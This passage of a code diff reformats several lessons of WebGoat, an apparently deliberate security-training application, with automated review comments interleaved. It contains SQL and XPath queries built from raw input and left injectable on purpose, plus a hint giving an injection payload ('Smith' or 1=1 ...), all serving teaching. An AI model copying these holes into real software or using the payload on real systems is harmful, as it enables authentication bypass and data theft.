" + "Intercept the + * HTTP request and try to create a soap request."); + */ + return hints; } - return (ec); - } + private final static Integer DEFAULT_RANKING = new Integer(150); - public ResultSet getResults(String id) - { - try + protected Integer getDefaultRanking() { - Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext()); - String query = "SELECT * FROM user_data WHERE userid = " + id; - try - { - Statement statement = connection.createStatement( - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - ResultSet results = statement.executeQuery(query); - return results; - } - catch (SQLException sqle) - {} + return DEFAULT_RANKING; } - catch (Exception e) - {} - return null; - } - - public String[] getCreditCard(String id) - { - ResultSet results = getResults(id); - if ((results != null)) + public String getTitle() { - try - { - results.last(); - String[] users = new String[results.getRow()]; - if (users.length > 4) - { - completed = true; - } - results.beforeFirst(); - while (results.next() == true) - { - int i = results.getRow(); - users[i - 1] = results.getString(ccNumber); - } - return users; - } - catch (SQLException sqle) - {} + return "Web Service SQL Injection"; } - return null; - } + protected Element makeAccountLine(WebSession s) + { + ElementContainer ec = new ElementContainer(); - public Element getCredits() - { - return super.getCustomCredits("By Alex Smolen", CREDITS_LOGO); - } + ec.addElement(new P().addElement("Enter your Account Number: ")); + + accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101"); + Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString()); + ec.addElement(input); + + Element b = ECSFactory.makeButton("Go!"); + ec.addElement(b); + + return ec; + } + + protected Element createContent(WebSession s) + { + ElementContainer ec = new ElementContainer(); + try + { + ec.addElement(makeAccountLine(s)); + + String query = "SELECT * FROM user_data WHERE userid = " + 
accountNumber; + ec.addElement(new PRE(query)); + for (int i = 0; i < accountNumber.length(); i++) + { + char c = accountNumber.charAt(i); + if (c < '0' || c > '9') + { + ec.addElement("Invalid account number. "); + accountNumber = "0"; + } + } + try + { + ResultSet results = getResults(accountNumber); + if ((results != null) && (results.first() == true)) + { + ResultSetMetaData resultsMetaData = results.getMetaData(); + ec.addElement(DatabaseUtilities.writeTable(results, resultsMetaData)); + results.last(); + if (results.getRow() >= 6) + { + // this should never happen + } + } + else + { + ec.addElement("No results matched. Try Again."); + } + } catch (SQLException sqle) + { + ec.addElement(new P().addElement(sqle.getMessage())); + } + A a = new A("services/WsSqlInjection?WSDL", "WebGoat WSDL File"); + ec.addElement(new P().addElement("Exploit the following WSDL to access sensitive data:")); + ec.addElement(new BR()); + ec.addElement(a); + getLessonTracker(s).setCompleted(completed); + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + return (ec); + } + + public ResultSet getResults(String id) + { + try + { + Connection connection = DatabaseUtilities.getConnection("guest", getWebgoatContext()); + String query = "SELECT * FROM user_data WHERE userid = " + id; + try + { + Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, + ResultSet.CONCUR_READ_ONLY); + ResultSet results = statement.executeQuery(query); + return results; + } catch (SQLException sqle) + { + } + } catch (Exception e) + { + } + return null; + } + + public String[] getCreditCard(String id) + { + ResultSet results = getResults(id); + if ((results != null)) + { + try + { + results.last(); + String[] users = new String[results.getRow()]; + if (users.length > 4) + { + completed = true; + } + results.beforeFirst(); + while (results.next() == true) + { + int i = results.getRow(); + users[i - 1] = 
results.getString(ccNumber); + } + return users; + } catch (SQLException sqle) + { + } + } + return null; + } + + public Element getCredits() + { + return super.getCustomCredits("By Alex Smolen", CREDITS_LOGO); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/XMLInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/XMLInjection.java index 726365dc1..9dd5db8ca 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/XMLInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/XMLInjection.java @@ -1,10 +1,10 @@ + package org.owasp.webgoat.lessons; import java.io.PrintWriter; import java.util.ArrayList; import java.util.HashMap; import java.util.List; - import org.apache.ecs.Element; import org.apache.ecs.ElementContainer; import org.apache.ecs.StringElement; 
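Review bot: Both catch blocks in getResults() on the new side are empty (`catch (SQLException sqle) { }` and `catch (Exception e) { }`), so a failed connection or query silently becomes a null return that createContent() then reports to the user as "No results matched", and getCreditCard() swallows its SQLException the same way. The file already uses printStackTrace() in createContent(), so the minimal consistent fix is `catch (SQLException sqle) { sqle.printStackTrace(); }` at each of those sites. The Connection and Statement opened in getResults() are also never closed on any path, so every request leaks one of each. Separately, `completed` is a static field shared by all sessions, so once any caller of getCreditCard() sets it, `getLessonTracker(s).setCompleted(completed)` in createContent() marks the lesson complete for every other user as well. The string-built query in getResults() is this lesson's intended injection point, so I am not asking for a PreparedStatement there.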
@@ -20,368 +20,310 @@ import org.apache.ecs.html.TR; import org.apache.ecs.html.Table; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * - * @author Sherif Koussa Macadamian Technologies. + * @author Sherif Koussa Macadamian Technologies. */ public class XMLInjection extends LessonAdapter { - private final static Integer DEFAULT_RANKING = new Integer(20); + private final static Integer DEFAULT_RANKING = new Integer(20); - private final static String ACCOUNTID = "accountID"; + private final static String ACCOUNTID = "accountID"; - public static HashMap rewardsMap = new HashMap(); + public static HashMap rewardsMap = new HashMap(); - private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt( - "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0); + private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies") + .setBorder(0).setHspace(0).setVspace(0); - protected static HashMap init() - { - Reward r = new Reward(); - - r.setName("WebGoat t-shirt"); - r.setPoints(50); - rewardsMap.put(1001, r); - - r = new Reward(); - r.setName("WebGoat Secure Kettle"); - r.setPoints(30); - rewardsMap.put(1002, r); - - r = new Reward(); - r.setName("WebGoat Mug"); - r.setPoints(20); - rewardsMap.put(1003, r); - - r = new Reward(); - r.setName("WebGoat Core Duo Laptop"); - r.setPoints(2000); - rewardsMap.put(1004, r); - - r = new Reward(); - r.setName("WebGoat Hawaii Cruise"); - r.setPoints(3000); - rewardsMap.put(1005, r); - - return rewardsMap; - } - - - public void handleRequest(WebSession s) - { - - try + 
protected static HashMap init() { - if (s.getParser().getRawParameter("from", "").equals("ajax")) - { - if (s.getParser().getRawParameter(ACCOUNTID, "").equals( - "836239")) + Reward r = new Reward(); + + r.setName("WebGoat t-shirt"); + r.setPoints(50); + rewardsMap.put(1001, r); + + r = new Reward(); + r.setName("WebGoat Secure Kettle"); + r.setPoints(30); + rewardsMap.put(1002, r); + + r = new Reward(); + r.setName("WebGoat Mug"); + r.setPoints(20); + rewardsMap.put(1003, r); + + r = new Reward(); + r.setName("WebGoat Core Duo Laptop"); + r.setPoints(2000); + rewardsMap.put(1004, r); + + r = new Reward(); + r.setName("WebGoat Hawaii Cruise"); + r.setPoints(3000); + rewardsMap.put(1005, r); + + return rewardsMap; + } + + public void handleRequest(WebSession s) + { + + try { - String lineSep = System.getProperty("line.separator"); - String xmlStr = "" + lineSep - + "WebGoat Mug 20 Pts" - + lineSep - + "WebGoat t-shirt 50 Pts" - + lineSep + "WebGoat Secure Kettle 30 Pts" - + lineSep + ""; - s.getResponse().setContentType("text/xml"); - s.getResponse().setHeader("Cache-Control", "no-cache"); - PrintWriter out = new PrintWriter(s.getResponse() - .getOutputStream()); - out.print(xmlStr); - out.flush(); - out.close(); - return; + if (s.getParser().getRawParameter("from", "").equals("ajax")) + { + if (s.getParser().getRawParameter(ACCOUNTID, "").equals("836239")) + { + String lineSep = System.getProperty("line.separator"); + String xmlStr = "" + lineSep + "WebGoat Mug 20 Pts" + lineSep + + "WebGoat t-shirt 50 Pts" + lineSep + + "WebGoat Secure Kettle 30 Pts" + lineSep + ""; + s.getResponse().setContentType("text/xml"); + s.getResponse().setHeader("Cache-Control", "no-cache"); + PrintWriter out = new PrintWriter(s.getResponse().getOutputStream()); + out.print(xmlStr); + out.flush(); + out.close(); + return; + } + } + } catch (Exception ex) + { + ex.printStackTrace(); } - } - } - catch (Exception ex) - { - ex.printStackTrace(); + + Form form = new Form(getFormAction(), 
Form.POST).setName("form").setEncType(""); + + form.addElement(createContent(s)); + + setContent(form); + } - Form form = new Form(getFormAction(), Form.POST).setName("form") - .setEncType(""); - - form.addElement(createContent(s)); - - setContent(form); - - } - - - protected Element createContent(WebSession s) - { - ElementContainer ec = new ElementContainer(); - boolean isDone = false; - init(); - - if (s.getParser().getRawParameter("done", "").equals("yes")) + protected Element createContent(WebSession s) { - isDone = true; - } - String lineSep = System.getProperty("line.separator"); - String script = "" + lineSep; + ElementContainer ec = new ElementContainer(); + boolean isDone = false; + init(); - if (!isDone) - { - ec.addElement(new StringElement(script)); - } - ec.addElement(new BR().addElement(new H1() - .addElement("Welcome to WebGoat-Miles Reward Miles Program."))); - ec.addElement(new BR()); + if (s.getParser().getRawParameter("done", "").equals("yes")) + { + isDone = true; + } + String lineSep = System.getProperty("line.separator"); + String script = "" + + lineSep; - ec.addElement(new BR().addElement(new H3() - .addElement("Rewards available through the program:"))); - ec.addElement(new BR()); - Table t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0) - .setWidth("90%").setAlign("center"); - TR trRewards = null; + if (!isDone) + { + ec.addElement(new StringElement(script)); + } + ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat-Miles Reward Miles Program."))); + ec.addElement(new BR()); - for (int i = 1001; i < 1001 + rewardsMap.size(); i++) - { - trRewards = new TR(); - Reward r = (Reward) rewardsMap.get(i); - trRewards.addElement(new TD("-" + r.getName())); - trRewards.addElement(new TD(r.getPoints() + " Pts")); - t2.addElement(trRewards); - } + ec.addElement(new BR().addElement(new H3().addElement("Rewards available through the program:"))); + ec.addElement(new BR()); + Table t2 = new 
Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center"); + TR trRewards = null; - ec.addElement(t2); - - ec.addElement(new BR()); - - ec.addElement(new H3().addElement("Redeem your points:")); - ec.addElement(new BR()); - - Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0) - .setWidth("90%").setAlign("center"); - - TR tr = new TR(); - - tr.addElement(new TD("Please enter your account ID:")); - - Input input1 = new Input(Input.TEXT, ACCOUNTID, ""); - input1.addAttribute("onkeyup", "getRewards();"); - input1.addAttribute("id", ACCOUNTID); - tr.addElement(new TD(input1)); - t1.addElement(tr); - - ec.addElement(t1); - ec.addElement(new BR()); - ec.addElement(new BR()); - ec.addElement(new BR()); - - Div div = new Div(); - div.addAttribute("name", "rewardsDiv"); - div.addAttribute("id", "rewardsDiv"); - ec.addElement(div); - - Input b = new Input(); - b.setType(Input.SUBMIT); - b.setValue("Submit"); - b.setName("SUBMIT"); - ec.addElement(b); - - if (s.getParser().getRawParameter("SUBMIT", "") != "") - { - if (s.getParser().getRawParameter("check1004", "") != "") - { - makeSuccess(s); - } - else - { - StringBuffer shipment = new StringBuffer(); for (int i = 1001; i < 1001 + rewardsMap.size(); i++) { - - if (s.getParser().getRawParameter("check" + i, "") != "") - { - shipment.append(((Reward) rewardsMap.get(i)).getName() - + "
"); - } + trRewards = new TR(); + Reward r = (Reward) rewardsMap.get(i); + trRewards.addElement(new TD("-" + r.getName())); + trRewards.addElement(new TD(r.getPoints() + " Pts")); + t2.addElement(trRewards); } - shipment - .insert(0, - "

The following items will be shipped to your address:
"); - ec.addElement(new StringElement(shipment.toString())); - } + ec.addElement(t2); + + ec.addElement(new BR()); + + ec.addElement(new H3().addElement("Redeem your points:")); + ec.addElement(new BR()); + + Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center"); + + TR tr = new TR(); + + tr.addElement(new TD("Please enter your account ID:")); + + Input input1 = new Input(Input.TEXT, ACCOUNTID, ""); + input1.addAttribute("onkeyup", "getRewards();"); + input1.addAttribute("id", ACCOUNTID); + tr.addElement(new TD(input1)); + t1.addElement(tr); + + ec.addElement(t1); + ec.addElement(new BR()); + ec.addElement(new BR()); + ec.addElement(new BR()); + + Div div = new Div(); + div.addAttribute("name", "rewardsDiv"); + div.addAttribute("id", "rewardsDiv"); + ec.addElement(div); + + Input b = new Input(); + b.setType(Input.SUBMIT); + b.setValue("Submit"); + b.setName("SUBMIT"); + ec.addElement(b); + + if (s.getParser().getRawParameter("SUBMIT", "") != "") + { + if (s.getParser().getRawParameter("check1004", "") != "") + { + makeSuccess(s); + } + else + { + StringBuffer shipment = new StringBuffer(); + for (int i = 1001; i < 1001 + rewardsMap.size(); i++) + { + + if (s.getParser().getRawParameter("check" + i, "") != "") + { + shipment.append(((Reward) rewardsMap.get(i)).getName() + "
"); + } + } + shipment.insert(0, "

The following items will be shipped to your address:
"); + ec.addElement(new StringElement(shipment.toString())); + } + + } + + return ec; } - return ec; - } - - - protected Element makeSuccess(WebSession s) - { - getLessonTracker(s).setCompleted(true); - - s - .setMessage("Congratulations. You have successfully completed this lesson."); - - return (null); - } - - - public Element getCredits() - { - return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); - } - - - protected Category getDefaultCategory() - { - - return Category.AJAX_SECURITY; - } - - - protected Integer getDefaultRanking() - { - - return DEFAULT_RANKING; - } - - - protected List getHints(WebSession s) - { - - List hints = new ArrayList(); - hints.add("This page is using XMLHTTP to comunicate with the server."); - hints.add("Try to intercept the reply and check the reply."); - hints - .add("Intercept the reply and try to inject some XML to add more rewards to yourself."); - return hints; - } - - - public String getTitle() - { - return "XML Injection"; - } - - static class Reward - { - - private String name; - - private int points; - - - public String getName() + protected Element makeSuccess(WebSession s) { - return name; + getLessonTracker(s).setCompleted(true); + + s.setMessage("Congratulations. 
You have successfully completed this lesson."); + + return (null); } - - public void setName(String name) + public Element getCredits() { - this.name = name; + return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); } - - public int getPoints() + protected Category getDefaultCategory() { - return points; + + return Category.AJAX_SECURITY; } - - public void setPoints(int points) + protected Integer getDefaultRanking() { - this.points = points; + + return DEFAULT_RANKING; } - } + protected List getHints(WebSession s) + { + + List hints = new ArrayList(); + hints.add("This page is using XMLHTTP to comunicate with the server."); + hints.add("Try to intercept the reply and check the reply."); + hints.add("Intercept the reply and try to inject some XML to add more rewards to yourself."); + return hints; + } + + public String getTitle() + { + return "XML Injection"; + } + + static class Reward + { + + private String name; + + private int points; + + public String getName() + { + return name; + } + + public void setName(String name) + { + this.name = name; + } + + public int getPoints() + { + return points; + } + + public void setPoints(int points) + { + this.points = points; + } + + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/XPATHInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/XPATHInjection.java index ba98ab3d3..6307b8783 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/XPATHInjection.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/XPATHInjection.java @@ -1,6 +1,7 @@ /** * */ + package org.owasp.webgoat.lessons; import java.io.File; 
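Review bot: The submit handling in createContent() compares request parameters by reference, `if (s.getParser().getRawParameter("SUBMIT", "") != "")`, and the same pattern is used for `"check1004"` and `"check" + i`. This only works by accident: the interned `""` default is the same object as the literal, while any value actually present in the request is a distinct String, so an explicitly empty parameter is treated as set. Replace each with a content check, e.g. `if (!s.getParser().getRawParameter("SUBMIT", "").isEmpty())`. init() also repopulates the public static rewardsMap on every createContent() call, which is presumably harmless while the keys are fixed but is not safe under concurrent requests against a plain HashMap; a static initializer would do that work once.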
@@ -11,12 +12,10 @@ import java.io.FileInputStream;
 import org.xml.sax.InputSource;
 import org.w3c.dom.NodeList;
 import org.w3c.dom.Node;
-
 import javax.xml.xpath.XPathConstants;
 import javax.xml.xpath.XPath;
 import javax.xml.xpath.XPathFactory;
 import javax.xml.xpath.XPathExpressionException;
-
 import org.apache.ecs.Element;
 import org.apache.ecs.ElementContainer;
 import org.apache.ecs.StringElement;
@@ -32,234 +31,208 @@ import org.apache.ecs.html.BR; import org.apache.ecs.html.B; import org.apache.ecs.html.PRE; import org.apache.ecs.HtmlColor; - import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.session.ECSFactory; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ * - * @author Sherif Koussa Macadamian Technologies. - * @created November 28, 2006 + * @author Sherif Koussa Macadamian Technologies. + * @created November 28, 2006 */ public class XPATHInjection extends LessonAdapter { - private final static Integer DEFAULT_RANKING = new Integer(74); + private final static Integer DEFAULT_RANKING = new Integer(74); - private final static String USERNAME = "Username"; + private final static String USERNAME = "Username"; - private final static String PASSWORD = "Password"; + private final static String PASSWORD = "Password"; - private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt( - "Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0); + private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt("Macadamian Technologies") + .setBorder(0).setHspace(0).setVspace(0); - protected Element createContent(WebSession s) - { - - NodeList nodes = null; - ElementContainer ec = new ElementContainer(); - - try + protected Element createContent(WebSession s) { - ec.addElement(new BR().addElement(new H1() - .addElement("Welcome to WebGoat employee intranet"))); - ec.addElement(new BR()); - Table t1 = new Table().setCellSpacing(0).setCellPadding(0) - .setBorder(0).setWidth("90%").setAlign("center"); - TR tr = new TR(); - tr - .addElement(new TH() - .addElement( - "Please confirm your username and password before viewing your profile.") - 
.setColSpan(2).setAlign("left")); - t1.addElement(tr); + NodeList nodes = null; + ElementContainer ec = new ElementContainer(); - tr = new TR(); - tr.addElement(new TD().addElement("*Required Fields").setWidth( - "30%").setColSpan(2).setAlign("left")); - t1.addElement(tr); + try + { + ec.addElement(new BR().addElement(new H1().addElement("Welcome to WebGoat employee intranet"))); + ec.addElement(new BR()); + Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center"); - tr = new TR(); - tr.addElement(new TD().addElement(" ").setWidth("30%") - .setColSpan(2).setAlign("left")); - t1.addElement(tr); + TR tr = new TR(); + tr.addElement(new TH().addElement("Please confirm your username and password before viewing your profile.") + .setColSpan(2).setAlign("left")); + t1.addElement(tr); - tr = new TR(); - tr.addElement(new TD(new B(new StringElement("*User Name: ")))); + tr = new TR(); + tr.addElement(new TD().addElement("*Required Fields").setWidth("30%").setColSpan(2).setAlign("left")); + t1.addElement(tr); - Input input1 = new Input(Input.TEXT, USERNAME, ""); - tr.addElement(new TD(input1)); - t1.addElement(tr); + tr = new TR(); + tr.addElement(new TD().addElement(" ").setWidth("30%").setColSpan(2).setAlign("left")); + t1.addElement(tr); - tr = new TR(); - tr.addElement(new TD(new B(new StringElement("*Password: ")))); + tr = new TR(); + tr.addElement(new TD(new B(new StringElement("*User Name: ")))); - Input input2 = new Input(Input.PASSWORD, PASSWORD, ""); - tr.addElement(new TD(input2)); - t1.addElement(tr); + Input input1 = new Input(Input.TEXT, USERNAME, ""); + tr.addElement(new TD(input1)); + t1.addElement(tr); - Element b = ECSFactory.makeButton("Submit"); - t1.addElement(new TR(new TD(b))); - ec.addElement(t1); + tr = new TR(); + tr.addElement(new TD(new B(new StringElement("*Password: ")))); - String username = s.getParser().getRawParameter(USERNAME, ""); - if (username == null || username.length() == 0) - { - 
ec.addElement(new P().addElement(new StringElement( - "Username is a required field"))); + Input input2 = new Input(Input.PASSWORD, PASSWORD, ""); + tr.addElement(new TD(input2)); + t1.addElement(tr); + + Element b = ECSFactory.makeButton("Submit"); + t1.addElement(new TR(new TD(b))); + ec.addElement(t1); + + String username = s.getParser().getRawParameter(USERNAME, ""); + if (username == null || username.length() == 0) + { + ec.addElement(new P().addElement(new StringElement("Username is a required field"))); + return ec; + } + + String password = s.getParser().getRawParameter(PASSWORD, ""); + if (password == null || password.length() == 0) + { + ec.addElement(new P().addElement(new StringElement("Password is a required field"))); + return ec; + } + + String dir = s.getContext().getRealPath("/lessons/XPATHInjection/EmployeesData.xml"); + File d = new File(dir); + XPathFactory factory = XPathFactory.newInstance(); + XPath xPath = factory.newXPath(); + InputSource inputSource = new InputSource(new FileInputStream(d)); + String expression = "/employees/employee[loginID/text()='" + username + "' and passwd/text()='" + password + + "']"; + nodes = (NodeList) xPath.evaluate(expression, inputSource, XPathConstants.NODESET); + int nodesLength = nodes.getLength(); + + Table t2 = null; + if (nodesLength > 0) + { + t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(1).setWidth("90%").setAlign("center"); + tr = new TR(); + tr.setBgColor(HtmlColor.GRAY); + tr.addElement(new TD().addElement("Username")); + tr.addElement(new TD().addElement("Account No.")); + tr.addElement(new TD().addElement("Salary")); + t2.addElement(tr); + } + + for (int i = 0; i < nodesLength; i++) + { + Node node = nodes.item(i); + String[] arrTokens = node.getTextContent().split("[\\t\\s\\n]+"); + + tr = new TR(); + tr.addElement(new TD().addElement(arrTokens[1])); + tr.addElement(new TD().addElement(arrTokens[2])); + tr.addElement(new TD().addElement(arrTokens[4])); + t2.addElement(tr); + + } 
+ if (nodes.getLength() > 1) + { + makeSuccess(s); + } + if (t2 != null) + { + ec.addElement(new PRE()); + ec.addElement(t2); + } + + } catch (IOException e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } catch (IllegalArgumentException e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } catch (XPathExpressionException e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } return ec; - } - - String password = s.getParser().getRawParameter(PASSWORD, ""); - if (password == null || password.length() == 0) - { - ec.addElement(new P().addElement(new StringElement( - "Password is a required field"))); - return ec; - } - - String dir = s.getContext().getRealPath( - "/lessons/XPATHInjection/EmployeesData.xml"); - File d = new File(dir); - XPathFactory factory = XPathFactory.newInstance(); - XPath xPath = factory.newXPath(); - InputSource inputSource = new InputSource(new FileInputStream(d)); - String expression = "/employees/employee[loginID/text()='" - + username + "' and passwd/text()='" + password + "']"; - nodes = (NodeList) xPath.evaluate(expression, inputSource, - XPathConstants.NODESET); - int nodesLength = nodes.getLength(); - - Table t2 = null; - if (nodesLength > 0) - { - t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder( - 1).setWidth("90%").setAlign("center"); - tr = new TR(); - tr.setBgColor(HtmlColor.GRAY); - tr.addElement(new TD().addElement("Username")); - tr.addElement(new TD().addElement("Account No.")); - tr.addElement(new TD().addElement("Salary")); - t2.addElement(tr); - } - - for (int i = 0; i < nodesLength; i++) - { - Node node = nodes.item(i); - String[] arrTokens = node.getTextContent() - .split("[\\t\\s\\n]+"); - - tr = new TR(); - tr.addElement(new TD().addElement(arrTokens[1])); - tr.addElement(new TD().addElement(arrTokens[2])); - tr.addElement(new TD().addElement(arrTokens[4])); - 
t2.addElement(tr); - - } - if (nodes.getLength() > 1) - { - makeSuccess(s); - } - if (t2 != null) - { - ec.addElement(new PRE()); - ec.addElement(t2); - } - } - catch (IOException e) + + public Element getCredits() { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); } - catch (IllegalArgumentException e) + + protected Category getDefaultCategory() { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + + return Category.INJECTION; } - catch (XPathExpressionException e) + + protected boolean getDefaultHidden() { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + // TODO Auto-generated method stub + return false; } - return ec; - } + protected Integer getDefaultRanking() + { - public Element getCredits() - { - return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO); - } + return DEFAULT_RANKING; + } + protected List getHints(WebSession s) + { + // TODO Auto-generated method stub + List hints = new ArrayList(); + hints.add("Remember that the data is stored in XML format."); + hints.add("The system is using XPath to query."); + hints.add("XPath is almost the same thing as SQL, the same hacking techniques apply too."); + hints.add("Try username: Smith' or 1=1 or 'a'='a and a password: anything "); + return hints; + } - protected Category getDefaultCategory() - { + public String getTitle() + { - return Category.INJECTION; - } - - - protected boolean getDefaultHidden() - { - // TODO Auto-generated method stub - return false; - } - - - protected Integer getDefaultRanking() - { - - return DEFAULT_RANKING; - } - - - protected List getHints(WebSession s) - { - // TODO Auto-generated method stub - List hints = new ArrayList(); - hints.add("Remember that the data is stored in XML format."); - hints.add("The system is using XPath to query."); - hints - .add("XPath is almost the same 
thing as SQL, the same hacking techniques apply too."); - hints - .add("Try username: Smith' or 1=1 or 'a'='a and a password: anything "); - return hints; - } - - - public String getTitle() - { - - return "XPATH Injection"; - } + return "XPATH Injection"; + } } \ No newline at end of file diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/AdminScreen.java b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/AdminScreen.java index 95951a940..0b3e32f48 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/admin/AdminScreen.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/admin/AdminScreen.java 
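Review bot: The FileInputStream wrapped in the InputSource in createContent is never closed, so every submission of this form leaks a file descriptor until the collector finalizes it; the one-line fix is to let the parser own the stream, `InputSource inputSource = new InputSource(d.toURI().toString());`, otherwise the stream has to be held in a local and closed in a finally block. The row loop also reads `arrTokens[1]`, `arrTokens[2]` and `arrTokens[4]` without checking how many tokens the split produced, and ArrayIndexOutOfBoundsException is not among the three caught types, so a malformed employee record escapes the "Error generating" handling entirely; a guard such as `if (arrTokens.length < 5) continue;` before the TD lines would keep it inside the lesson page. The `// TODO Auto-generated method stub` comment at the top of getHints is stale and should be deleted. The string-built XPath expression is the subject of this lesson and is left as it is.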
@@ -1,104 +1,104 @@ + package org.owasp.webgoat.lessons.admin; import org.owasp.webgoat.lessons.AbstractLesson; import org.owasp.webgoat.session.Screen; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
